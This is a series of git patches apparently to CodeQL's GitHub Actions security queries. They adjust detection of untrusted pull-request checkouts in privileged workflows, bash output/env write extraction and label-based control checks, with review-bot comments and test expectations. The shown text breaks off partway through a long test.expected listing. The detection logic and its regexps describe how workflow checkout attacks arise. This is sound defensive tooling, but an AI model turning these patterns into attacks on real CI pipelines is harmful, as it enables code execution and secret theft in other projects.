@@ -10,6 +10,9 @@ | .github/workflows/issue_comment_3rd_party_action.yml:14:15:14:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:27:15:27:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:41:15:41:42 | eficode/resolve-pr-refs@main | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | +| .github/workflows/issue_comment_octokit2.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | +| .github/workflows/issue_comment_octokit2.yml:20:15:20:43 | octokit/request-action@v2.x.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x.x', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit2.yml:34:15:34:42 | some-action/some-repo@latest | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'some-action/some-repo' with ref 'latest', not a pinned commit 
hash | .github/workflows/issue_comment_octokit2.yml:33:9:37:6 | Uses Step | Uses Step | | .github/workflows/issue_comment_octokit.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | | .github/workflows/issue_comment_octokit.yml:20:15:20:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | | .github/workflows/issue_comment_octokit.yml:104:15:104:43 | octokit/request-action@v2.0.2 | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 3b2e5eb9de81..d36340d6bcca 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -93,6 +93,12 @@ edges | .github/workflows/issue_comment_heuristic.yml:11:9:24:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | | .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | | .github/workflows/issue_comment_heuristic.yml:37:7:48:4 | Run Step: vars | .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | +| .github/workflows/issue_comment_octokit2.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit2.yml:26:9:27:6 | name: C ... ildcard | +| .github/workflows/issue_comment_octokit2.yml:26:9:27:6 | name: C ... ildcard | .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | +| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | +| .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | .github/workflows/issue_comment_octokit2.yml:33:9:37:6 | Uses Step | +| .github/workflows/issue_comment_octokit2.yml:33:9:37:6 | Uses Step | .github/workflows/issue_comment_octokit2.yml:37:9:38:37 | Uses Step | | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | 
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 1d6122b37479..8e3ecaee5476 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -5,6 +5,7 @@ | .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | From 6802cd2398adf5f5b90b889c5575ff60d2237eda Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 25 Oct 2024 10:25:18 +0200 Subject: [PATCH 630/707] Improve checkout trigger events checks --- .../security/UntrustedCheckoutQuery.qll | 56 ++++++++----------- .../CWE-829/UntrustedCheckoutCritical.ql | 1 + .../Security/CWE-829/UntrustedCheckoutHigh.ql | 1 + 3 files changed, 25 insertions(+), 33 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 01da214b6eaa..ffbb6fac2637 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
+++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -13,7 +13,7 @@ string checkoutTriggers() { */ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - source.asExpr().getATriggerEvent().getName() = checkoutTriggers() and + //source.asExpr().getATriggerEvent().getName() = checkoutTriggers() and ( // remote flow sources source instanceof ArtifactSource 
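Review bot: The trigger-event check in `isSource` is disabled by commenting it out rather than removed, leaving `//source.asExpr().getATriggerEvent().getName() = checkoutTriggers() and` as dead code; the same pattern appears in the `ActionsMutableRefCheckout`, `ActionsSHACheckout`, `GitMutableRefCheckout`, `GitSHACheckout`, `GhMutableRefCheckout` and `GhSHACheckout` hunks below. Since the constraint is re-applied in UntrustedCheckoutCritical.ql and UntrustedCheckoutHigh.ql as `event.getName() = checkoutTriggers()` (last two files of this commit), delete the commented lines and record the move once, e.g. `// Not restricted by trigger event here; the queries filter on checkoutTriggers().`. `isSource` and the enclosing `ActionsMutableRefCheckoutConfig` module both continue outside the hunk.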
@@ -209,29 +209,24 @@ abstract class SHACheckoutStep extends PRHeadCheckoutStep { } class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesStep { ActionsMutableRefCheckout() { this.getCallee() = "actions/checkout" and + //this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and ( exists( ActionsMutableRefCheckoutFlow::PathNode source, ActionsMutableRefCheckoutFlow::PathNode sink | ActionsMutableRefCheckoutFlow::flowPath(source, sink) and - sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) + this.getArgumentExpr(["ref", "repository"]) = sink.getNode().asExpr() ) or // heuristic base on the step id and field name - exists(string value | - this.getArgumentExpr("ref") - .(SimpleReferenceExpression) - .getEnclosingJob() - .getATriggerEvent() - .getName() = checkoutTriggers() and - value.regexpMatch(".*(head|branch|ref).*") + exists(string value, Expression expr | + value.regexpMatch(".*(head|branch|ref).*") and expr = this.getArgumentExpr("ref") | - this.getArgumentExpr("ref").(StepsExpression).getStepId() = value or - this.getArgumentExpr("ref").(StepsExpression).getFieldName() = value or - this.getArgumentExpr("ref").(NeedsExpression).getNeededJobId() = value or - this.getArgumentExpr("ref").(NeedsExpression).getFieldName() = value or - this.getArgumentExpr("ref").(JsonReferenceExpression).getAccessPath() = value or - this.getArgumentExpr("ref").(JsonReferenceExpression).getInnerExpression() = value + expr.(StepsExpression).getStepId() = value or + expr.(SimpleReferenceExpression).getFieldName() = value or + expr.(NeedsExpression).getNeededJobId() = value or + expr.(JsonReferenceExpression).getAccessPath() = value or + expr.(JsonReferenceExpression).getInnerExpression() = value ) ) } 
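Review bot: The heuristic branch of `ActionsMutableRefCheckout` loses its trigger-event restriction: the removed lines required `getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers()`, and the replacement at class level is commented out, so the class now matches any `actions/checkout` whose `ref` argument merely contains `head`, `branch` or `ref`. UntrustedCheckoutCritical.ql and UntrustedCheckoutHigh.ql re-apply the filter with `event.getName() = checkoutTriggers()`, but any other query or test that selects `MutableRefCheckoutStep` directly now gets the wider set; if that is intended, replace the commented line with `// trigger-event filtering is done by the queries, not by this class`. Folding `(StepsExpression).getFieldName()` and `(NeedsExpression).getFieldName()` into `expr.(SimpleReferenceExpression).getFieldName()` only preserves the old matches if both classes are subclasses of `SimpleReferenceExpression`, which is not visible here and worth confirming. The `ActionsSHACheckout` hunk that follows has the same two issues. The class continues past the end of the hunk.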
@@ -247,27 +242,22 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ActionsSHACheckout() { this.getCallee() = "actions/checkout" and + //this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and ( exists(ActionsSHACheckoutFlow::PathNode source, ActionsSHACheckoutFlow::PathNode sink | ActionsSHACheckoutFlow::flowPath(source, sink) and - sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) + this.getArgumentExpr(["ref", "repository"]) = sink.getNode().asExpr() ) or // heuristic base on the step id and field name - exists(string value | - this.getArgumentExpr("ref") - .(SimpleReferenceExpression) - .getEnclosingJob() - .getATriggerEvent() - .getName() = checkoutTriggers() and - value.regexpMatch(".*(head|sha|commit).*") + exists(string value, Expression expr | + value.regexpMatch(".*(head|sha|commit).*") and expr = this.getArgumentExpr("ref") | - this.getArgumentExpr("ref").(StepsExpression).getStepId() = value or - this.getArgumentExpr("ref").(StepsExpression).getFieldName() = value or - this.getArgumentExpr("ref").(NeedsExpression).getNeededJobId() = value or - this.getArgumentExpr("ref").(NeedsExpression).getFieldName() = value or - this.getArgumentExpr("ref").(JsonReferenceExpression).getAccessPath() = value or - this.getArgumentExpr("ref").(JsonReferenceExpression).getInnerExpression() = value + expr.(StepsExpression).getStepId() = value or + expr.(SimpleReferenceExpression).getFieldName() = value or + expr.(NeedsExpression).getNeededJobId() = value or + expr.(JsonReferenceExpression).getAccessPath() = value or + expr.(JsonReferenceExpression).getInnerExpression() = value ) ) } 
@@ -283,7 +273,7 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep {
 class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run {
   GitMutableRefCheckout() {
     exists(string cmd | this.getScript().getACommand() = cmd |
-      this.getATriggerEvent().getName() = checkoutTriggers() and
+      //this.getATriggerEvent().getName() = checkoutTriggers() and
       cmd.regexpMatch("git\\s+(fetch|pull).*") and
       (
         (containsHeadRef(cmd) or containsPullRequestNumber(cmd))
@@ -307,7 +297,7 @@ class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run {
 class GitSHACheckout extends SHACheckoutStep instanceof Run {
   GitSHACheckout() {
     exists(string cmd | this.getScript().getACommand() = cmd |
-      this.getATriggerEvent().getName() = checkoutTriggers() and
+      //this.getATriggerEvent().getName() = checkoutTriggers() and
       cmd.regexpMatch("git\\s+(fetch|pull).*") and
       (
         containsHeadSHA(cmd)
@@ -328,7 +318,7 @@ class GitSHACheckout extends SHACheckoutStep instanceof Run {
 class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run {
   GhMutableRefCheckout() {
     exists(string cmd | this.getScript().getACommand() = cmd |
-      this.getATriggerEvent().getName() = checkoutTriggers() and
+      //this.getATriggerEvent().getName() = checkoutTriggers() and
       cmd.regexpMatch(".*(gh|hub)\\s+pr\\s+checkout.*") and
       (
         (containsHeadRef(cmd) or containsPullRequestNumber(cmd))
@@ -351,7 +341,7 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run {
 class GhSHACheckout extends SHACheckoutStep instanceof Run {
   GhSHACheckout() {
     exists(string cmd | this.getScript().getACommand() = cmd |
-      this.getATriggerEvent().getName() = checkoutTriggers() and
+      //this.getATriggerEvent().getName() = checkoutTriggers() and
       cmd.regexpMatch("gh\\s+pr\\s+checkout.*") and
       (
         containsHeadSHA(cmd)
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
index be3b02ae4777..07602af0ac4a 100644
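Review bot: Now that the trigger filter is gone from all four `Run`-based checkout classes, the command regexps are the only discriminators left, and the two `gh pr checkout` ones disagree: `GhMutableRefCheckout` matches `.*(gh|hub)\\s+pr\\s+checkout.*` while `GhSHACheckout` matches `gh\\s+pr\\s+checkout.*`, which is anchored at the start and does not accept `hub`. Unless that difference is intentional, a `hub pr checkout ...` command carrying a head SHA is classified by one class but not the other; `cmd.regexpMatch(".*(gh|hub)\\s+pr\\s+checkout.*") and` in GhSHACheckout would align them. The four `//this.getATriggerEvent()...` lines should be deleted rather than kept as comments, with a QLDoc note on each class that event filtering is now done by the query. Each constructor body continues past its hunk.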
--- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
@@ -48,6 +48,7 @@ where
   // the checkout occurs in a privileged context
   inPrivilegedContext(poisonable, event) and
   inPrivilegedContext(checkout, event) and
+  event.getName() = checkoutTriggers() and
   not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) and
   not exists(ControlCheck check | check.protects(poisonable, event, "untrusted-checkout"))
 select poisonable, checkout, poisonable,
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql
index e130ba5dbb8a..39cd18600975 100644
--- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql
@@ -24,6 +24,7 @@ where
   not checkout.getAFollowingStep() instanceof PoisonableStep and
   // the checkout occurs in a privileged context
   inPrivilegedContext(checkout, event) and
+  event.getName() = checkoutTriggers() and
   (
     // issue_comment: check for date comparison checks and actor/access control checks
     event.getName() = "issue_comment" and
From d8f79818d6ffd1f572bf1a88bad78124785acd3d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 25 Oct 2024 10:25:47 +0200
Subject: [PATCH 631/707] Improve extraction of Output/Env assignments
---
 ql/lib/codeql/actions/Bash.qll | 16 ++++++++--------
 1 file changed, 8 insertions(+), 8 deletions(-)
diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll
index c1e038069eb1..fda27732828e 100644
--- a/ql/lib/codeql/actions/Bash.qll
+++ b/ql/lib/codeql/actions/Bash.qll
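Review bot: In UntrustedCheckoutHigh.ql the new `event.getName() = checkoutTriggers() and` is conjoined in front of a disjunction whose first branch requires `event.getName() = "issue_comment"`; that branch, and any other event-specific branch further down, becomes unsatisfiable unless `checkoutTriggers()` yields those event names, which cannot be confirmed from here. Worth verifying that the set returned by `checkoutTriggers()` covers every event the `where` clause special-cases, and recording it next to the new line: `// checkoutTriggers() must include every event name matched in the disjunction below`. The identical filter in UntrustedCheckoutCritical.ql has no such interaction. The `from` clauses of both queries and the remainder of the High query's disjunction lie outside the hunks.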
@@ -256,20 +256,20 @@ class BashShellScript extends ShellScript { override predicate getAWriteToGitHubEnv(string name, string data) { exists(string raw | - Bash::extractFileWrite(this.getRawScript(), "GITHUB_ENV", raw) and + Bash::extractFileWrite(this, "GITHUB_ENV", raw) and Bash::extractVariableAndValue(raw, name, data) ) } override predicate getAWriteToGitHubOutput(string name, string data) { exists(string raw | - Bash::extractFileWrite(this.getRawScript(), "GITHUB_OUTPUT", raw) and + Bash::extractFileWrite(this, "GITHUB_OUTPUT", raw) and Bash::extractVariableAndValue(raw, name, data) ) } override predicate getAWriteToGitHubPath(string data) { - Bash::extractFileWrite(this.getRawScript(), "GITHUB_PATH", data) + Bash::extractFileWrite(this, "GITHUB_PATH", data) } override predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { @@ -542,12 +542,12 @@ module Bash { blockFileWrite(script, cmd, file, content, filters) } - bindingset[script, file_var] - predicate extractFileWrite(string script, string file_var, string content) { + bindingset[file_var] + predicate extractFileWrite(BashShellScript script, string file_var, string content) { // single line assignment exists(string file_expr, string raw_content | isParameterExpansion(file_expr, file_var, _, _) and - singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and + singleLineFileWrite(script.getAStmt(), _, file_expr, raw_content, _) and content = trimQuotes(raw_content) ) or @@ -566,12 +566,12 @@ module Bash { cmd = "add-path" and content = value ) and - singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) + singleLineWorkflowCmd(script.getAStmt(), cmd, key, value) ) or // multiline assignment exists(string file_expr, string raw_content | - multiLineFileWrite(script, _, file_expr, raw_content, _) and + multiLineFileWrite(script.getRawScript(), _, file_expr, raw_content, _) and isParameterExpansion(file_expr, file_var, _, _) and content = trimQuotes(raw_content) ) 
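Review bot: `extractFileWrite` now matches single-line redirections and workflow commands per statement (`script.getAStmt()`) but multi-line writes against the whole text (`script.getRawScript()`), and nothing documents which write forms each branch is meant to cover. If `getAStmt()` splits pipelines, a write such as `echo "X=$Y" | tee -a $GITHUB_ENV` is no longer one statement for `singleLineFileWrite` and must be picked up by the multi-line branch or is lost; this is inferred from the signature change, not visible in the hunk. I would add a QLDoc comment on the predicate, e.g. `/** Holds if script writes content to the file named by $file_var (GITHUB_ENV, GITHUB_OUTPUT or GITHUB_PATH). Single-line redirections and workflow commands are matched per statement; heredoc and block writes against the raw script. */`, plus a test for the pipe-to-tee form. The predicate and the enclosing `module Bash` continue outside the hunk.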
From 922ae57abaf8b68e4995c942aa7ef15796f66044 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 25 Oct 2024 10:26:47 +0200
Subject: [PATCH 632/707] Fix LabelIf ControlCheck so that it recognizes checks not at the beginning of the expression
---
 ql/lib/codeql/actions/security/ControlChecks.qll | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll
index c73b06ae5302..a24fd44b8650 100644
--- a/ql/lib/codeql/actions/security/ControlChecks.qll
+++ b/ql/lib/codeql/actions/security/ControlChecks.qll
@@ -165,7 +165,7 @@ class LabelIfCheck extends LabelCheck instanceof If {
     condition = normalizeExpr(this.getCondition()) and
     (
       // eg: contains(github.event.pull_request.labels.*.name, 'safe to test')
-      condition.regexpMatch("(^|[^!])contains\\(\\s*github\\.event\\.pull_request\\.labels\\b.*")
+      condition.regexpMatch(".*(^|[^!])contains\\(\\s*github\\.event\\.pull_request\\.labels\\b.*")
       or
       // eg: github.event.label.name == 'safe to test'
       condition.regexpMatch(".*\\bgithub\\.event\\.label\\.name\\s*==.*")
From e6e170402169663b894a77c02b2d1585b134a12e Mon Sep 17 00:00:00 2001
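Review bot: The new leading `.*` lets the label check match anywhere in the condition, including as the right-hand side of an `||`, so an expression like `github.event_name == 'push' || contains(github.event.pull_request.labels.*.name, 'safe to test')` is now counted as a protecting check even though the unlabelled branch still runs the checkout; this is hedged, since `normalizeExpr` (outside the hunk) may already split disjunctions. The `(^|[^!])` guard still rejects a directly negated `!contains(...)`, because `[^!]` has to be the character immediately before `contains`. If disjunctions are not handled upstream, either reject conditions containing `||` before this match or record the limitation: `// NOTE: matches anywhere in the expression; a label check OR-ed with another condition is still treated as protecting`. The class LabelIfCheck continues outside the hunk.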
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 25 Oct 2024 10:26:51 +0200 Subject: [PATCH 633/707] Update tests --- ql/test/library-tests/test.expected | 1741 ++++++++++++++++- ql/test/library-tests/test.ql | 55 - .../.github/workflows/resolve-args.yml | 36 + .../CWE-829/.github/workflows/test26.yml | 22 + .../CWE-829/.github/workflows/test27.yml | 22 + .../CWE-829/.github/workflows/test28.yml | 20 + .../UntrustedCheckoutCritical.expected | 10 +- .../CWE-829/UntrustedCheckoutMedium.expected | 3 + 8 files changed, 1849 insertions(+), 60 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index e2fb80df77f9..8d3e4193c69c 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -1,2 +1,1739 @@ -ERROR: Ast::ShellScript is incompatible with string (test.ql:24,66-67) -ERROR: getCallee() cannot be resolved for type DataFlowPublic::CallNode (test.ql:62,79-88) +files +| .github/workflows/commands.yml:0:0:0:0 | .github/workflows/commands.yml | +| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | +| .github/workflows/multiline2.yml:0:0:0:0 | .github/workflows/multiline2.yml | +| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | +| .github/workflows/poisonable_steps.yml:0:0:0:0 | .github/workflows/poisonable_steps.yml | +| .github/workflows/shell.yml:0:0:0:0 | .github/workflows/shell.yml | +| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | +workflows +| .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/test.yml:1:1:40:53 | on: push | +reusableWorkflows +compositeActions +jobs +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +localJobs +| 
.github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +extJobs +steps +| .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline2.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline2.yml:34:9:40:6 | Run 
Step | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline2.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline2.yml:85:9:89:35 | Run Step | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| 
